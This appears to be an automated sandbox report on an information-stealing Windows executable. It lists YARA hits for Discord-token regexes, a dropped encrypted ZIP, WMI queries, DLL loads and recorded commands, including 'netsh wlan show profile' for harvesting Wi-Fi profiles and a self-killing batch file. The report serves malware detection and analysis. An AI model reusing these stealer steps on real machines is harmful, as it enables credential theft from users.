Source: Process Memory Space: uyz4YPUyc9.exe PID: 5276, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen

Drops password protected ZIP file

Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted
Source: user@767668_en-CH.zip.0.dr	Zip Entry: encrypted

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F37A68	0_2_00007FF848F37A68
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F18C52	0_2_00007FF848F18C52
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F17EA6	0_2_00007FF848F17EA6
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F10F69	0_2_00007FF848F10F69
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F29231	0_2_00007FF848F29231
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F3318D	0_2_00007FF848F3318D
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F311DB	0_2_00007FF848F311DB
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F371F0	0_2_00007FF848F371F0
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F3276D	0_2_00007FF848F3276D
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F37B18	0_2_00007FF848F37B18
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F3DE01	0_2_00007FF848F3DE01
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F3C221	0_2_00007FF848F3C221
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Code function: 0_2_00007FF848F39280	0_2_00007FF848F39280

Source: uyz4YPUyc9.exe

Static PE information: No import functions for PE file found

Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D84849F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2314206876.000001D850FE0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2313054904.000001D850D04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D8388ED000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2314453858.000001D851020000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2307839115.000001D83860B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D848666000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2315086642.000001D851140000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2311102685.000001D8487D6000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.Text.Json.dll@ vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe, 00000000.00000002.2307463800.000001D8382A6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs uyz4YPUyc9.exe
Source: uyz4YPUyc9.exe	Binary or memory string: OriginalFilenamestub.exe6 vs uyz4YPUyc9.exe

Source: uyz4YPUyc9.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 0.0.uyz4YPUyc9.exe.1d836200000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000002.2307839115.000001D83850E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000000.00000000.2075922793.000001D836202000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: uyz4YPUyc9.exe PID: 5276, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions

Source: uyz4YPUyc9.exe, Report.cs

Task registration methods: 'CreateTask'

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@27/82@10/6

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

File created: C:\Users\user\AppData\Local\ba81f68da06a84e4da3badaf135a7290

Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Mutant created: \Sessions\1\BaseNamedObjects\KQZ3T3LTA8YRXZS7DM7X
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6176:120:WilError_03

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

File created: C:\Users\user\AppData\Local\Temp\tmpB6F1.tmp

Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\60a8b791-48db-4e1c-8ae7-cc6b3e8030df.bat"

Source: uyz4YPUyc9.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: uyz4YPUyc9.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 5276)

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tmpCCC0.tmp.dat.0.dr, tmpE2C4.tmp.dat.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: uyz4YPUyc9.exe

ReversingLabs: Detection: 87%

Source: unknown	Process created: C:\Users\user\Desktop\uyz4YPUyc9.exe "C:\Users\user\Desktop\uyz4YPUyc9.exe"
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: unknown	Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\60a8b791-48db-4e1c-8ae7-cc6b3e8030df.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 5276
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\60a8b791-48db-4e1c-8ae7-cc6b3e8030df.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /PID 5276	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /T 2 /NOBREAK	Jump to behavior

Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\uyz4YPUyc9.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
